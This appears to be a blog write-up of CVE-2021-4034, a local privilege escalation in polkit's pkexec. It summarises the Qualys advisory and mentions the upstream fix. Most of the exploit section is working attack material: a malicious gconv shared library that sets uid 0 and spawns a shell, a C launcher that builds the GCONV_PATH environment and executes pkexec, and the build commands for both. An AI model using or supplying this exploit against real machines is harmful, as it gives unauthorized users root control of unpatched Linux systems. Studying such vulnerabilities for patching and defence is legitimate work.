Vulnerability-Analysis - CVE-2021-4034 Linux Polkit Privilege Escalation

The major reference: Qualys’ Advisory

This article is also available in 简体中文.

Vulnerabilty Profile

2022-01-25，The Exploit details of CVE-2021-4034 released, the vulnerabilty is found by Qualys Security Team in the pkexec , which is a component of the polkit suite.

pkexec application is a tool to set uid, allowing a common user to execute a command as a privileged user according to a pre-defined policy. All mainstream Linux systems have this tool installed in default, and it’s executable has SUID bit set to work.

All pkexec versions since the first version in May 2009 are vulnerable to this. The commit: Add a pkexec(1) command (c8c3d835) · Commits · polkit / polkit · GitLab

Due to the widespread use of pkexec, the exploit of this vulnerability works in nearly all current Linux distributions with a wide range of effectiveness

Vulnerabilty Analysis

Please read the offical advisory: Qualys’ Advisory

In summary, we need 2 environment variable to exploit the vulnerabilty. First one is set to a arbitrary string, such as x, the second one is set to PATH=GCONV_PATH=., which will be concat with /x and the command to execute will become GCONV_PATH=./x. After running GCONV_PATH=./x, we reintroduced an insecure environment which leads to privilege escalation.

The Exploit

I installed a Ubuntu 20.04, and found the version of its pkexec is 0.105, which is vulnerable.

Firstly, we need to build a evil shared library, which is used to obtain the privileged shell.

The code is as shown below

#include <stdlib.h>
#include <unistd.h>
void gconv() {}
void gconv_init() {
  setuid(0); seteuid(0); setgid(0); setegid(0);
  system("PATH=/bin:/usr/bin:/sbin /bin/sh");
}

Build it

gcc -shared -fPIC payload.c -o payload.so

The exploit

• the LC_MESSAGES is used to set the charset
• set the XAUTHORITY to a illegal value to skip the normal execution, we only need the log function to exploit the vulnerabilty.

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

int main() {
    char* _argv[]={ NULL };
    char* _envp[]={
        "x",
        "PATH=GCONV_PATH=.",
        "LC_MESSAGES=en_US.UTF-8",
        "XAUTHORITY=..",
        NULL
    };
    mkdir("GCONV_PATH=.", 0777);
    mkdir("x", 0777);
    FILE *fp = fopen("x/gconv-modules", "wb");
    fprintf(fp, "module  UTF-8//    INTERNAL    ../payload    2\n");
    fclose(fp);
    fp = fopen("GCONV_PATH=./x", "wb");
    fclose(fp);
    chmod("GCONV_PATH=./x",0777);
    execve("/usr/bin/pkexec", _argv, _envp);
}

Build it

gcc exploit.c -o exp.out

Run ./exp.out and you will get the privileged shell.

Fix the Vulnerabilty

The modification: pkexec: local privilege escalation (CVE-2021-4034) (a2bf5c9c) · Commits · polkit / polkit · GitLab

As we can see, if the value of argc is less than 1, the program will exit directly.